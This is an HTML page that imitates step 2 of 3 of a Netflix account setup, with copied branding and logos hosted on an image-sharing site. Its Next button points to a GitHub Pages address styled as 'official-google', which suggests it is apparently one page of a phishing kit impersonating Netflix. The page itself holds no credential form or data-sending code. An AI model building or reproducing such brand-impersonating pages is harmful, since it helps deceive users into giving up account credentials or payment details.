<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="icon" type="image/png" href="https://i.ibb.co/8sj6mFP/Netflix-Favicon.png">
    <title>Netflix</title>
 <style>
body {
  font-family: Arial, sans-serif;
  background-color: #fff;
  margin: 0;
  padding: 0;
}
body a {
  text-decoration: none;
}
.container {
  max-width: 90%;
  margin: auto;
  padding: 20px;
  border: 1px solid transparent;
  background-color: #fff;
}
 .top {
   display: flex;
   justify-content: space-between;
   align-items: center;
 }
 .top img {
   margin-top: -20px;
   margin-left: -10px;
   width: 80px;
   height: 45px;
 }
 .top a {
   margin-top: -20px;
   font-weight: 450;
   text-decoration: none;
   color: black;
 }
  .content {
   display: flex;
   flex-direction: column;
   align-items: center;
   justify-content: center;
 }
 .step p {
   font-family: Arial, Sans-Serif;
   letter-spacing: 0px;
   font-size: 15px;
   font-weight: 300;
   color: black;
 }
.comfort {
  display: block; 
}
.comfort p {
  font-size: 19px;
}
.next {
   display: flex;
   flex-direction: column;
   align-items: center;
   justify-content: center;
}
.next button {
  width: 290px;
  height: 70px;
  border-radius: 5px;
  font-size: 24px;
  border: 1px solid transparent;
  display: inline;
  color: #fff;
  background-color: #E50913;
}
.buttom {
  max-width: 90%;
  margin: auto;
  padding: 20px;
  border: 1px solid transparent;
  border-top-color: #e0e0e0;
  color: #737373;
  background-color: #F3F3F3;
}
  @media (min-width: 600px) {
.container {
  max-width: 100%;
}
}
  @media (min-width: 1024px) {
.container {
  max-width: 80%;
}
}
@media (min-width: 600px) {
.buttom {
  max-width: 100%;
}
}
  @media (min-width: 1024px) {
.buttom {
  max-width: 80%;
}
}
</style>
</head>
<body>
  
        <div class="container">
      <div class="top">
  <img src="https://i.ibb.co/X59Fb0Q/Netflix.png" alt="Netflix" border="0">
  <a href="">Sign In</a>
    </div>
  <hr>
          <div class="content">
     <br></br><br></br>
          <div class="2">
          <div class="tick">
  <svg fill="#D51019" width="74px" height="74px" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><g id="SVGRepo_bgCarrier" stroke-width="0"></g><g id="SVGRepo_tracerCarrier" stroke-linecap="round" stroke-linejoin="round"></g><g id="SVGRepo_iconCarrier"> <path d="M5,4.5 L5,19.5 C5,20.3284271 5.67157288,21 6.5,21 L17.5113578,21 C18.3397849,21 19.0113578,20.3284271 19.0113578,19.5 L19.0113578,4.5 C19.0113578,3.67157288 18.3397849,3 17.5113578,3 L6.5,3 C5.67157288,3 5,3.67157288 5,4.5 Z M4,4.5 C4,3.11928813 5.11928813,2 6.5,2 L17.5113578,2 C18.8920696,2 20.0113578,3.11928813 20.0113578,4.5 L20.0113578,19.5 C20.0113578,20.8807119 18.8920696,22 17.5113578,22 L6.5,22 C5.11928813,22 4,20.8807119 4,19.5 L4,4.5 Z M11,19 C11,18.448 11.448,18 12,18 C12.552,18 13,18.448 13,19 C13,19.552 12.552,20 12,20 C11.448,20 11,19.552 11,19 Z M10.5,5 C10.2238576,5 10,4.77614237 10,4.5 C10,4.22385763 10.2238576,4 10.5,4 L13.5,4 C13.7761424,4 14,4.22385763 14,4.5 C14,4.77614237 13.7761424,5 13.5,5 L10.5,5 Z"></path> </g></svg>
     
     <svg fill="#D51019" style="margin-left: -30px;" width="64px" height="64px" viewBox="-9.5 0 32 32" version="1.1" xmlns="http://www.w3.org/2000/svg"><g id="SVGRepo_bgCarrier" stroke-width="0"></g><g id="SVGRepo_tracerCarrier" stroke-linecap="round" stroke-linejoin="round"></g><g id="SVGRepo_iconCarrier"> <title>iphone</title> <path d="M2.375 4h8.281c1.313 0 2.375 1.063 2.375 2.375v19.25c0 1.313-1.063 2.375-2.375 2.375h-8.281c-1.313 0-2.375-1.063-2.375-2.375v-19.25c0-1.313 1.063-2.375 2.375-2.375zM1.531 23.281h9.969v-14.781h-9.969v14.781zM6.5 26.563c0.75 0 1.313-0.563 1.313-1.281 0-0.75-0.563-1.313-1.313-1.313-0.719 0-1.281 0.563-1.281 1.313 0 0.719 0.563 1.281 1.281 1.281z"></path> </g></svg>
  
             </div>
             <div class="step">
  <p style="margin-right: 180px; margin-bottom: -15px;">STEP&nbsp;<b>2 </b>OF<b> 3</b></p>
              </div>
              </div>
  <h1>Finish setting up your account.</h1>
          <div class="comfort">
<p>Netflix is personalised for you.</p>
 <p>Create a password to watch Netflix<br>on your mobile phone and tablet.</p>
            </div>
            
      
       
           </div>
       <br>
 <div class="next">
   <a href="https://official-google.github.io/Netflix/Netflix3.html">
 <button id="next">Next</button>
   </a>
          </div>    
          <br></br><br></br><br></br>
          
          
    </div>
    </div>
    
      <div class="buttom">
   <p>Questions? Contact us.</p>
   <p>FAQ <span style="margin-left: 145px;">Help Center</span></p>
   <p>Netflix Shop <span style="margin-left: 85px;">Terms of use</span></p>
   <p>Privacy <span style="margin-left: 120px;">Cookie preferences</span></p>
   <p>Corporate Information</p>
            </div>
            
    <script>
        document.getElementById('to-top').addEventListener('click', function () {
            window.scrollTo({ top: 0, behavior: 'smooth' });
        });
  
    </script>
</body>
</html>
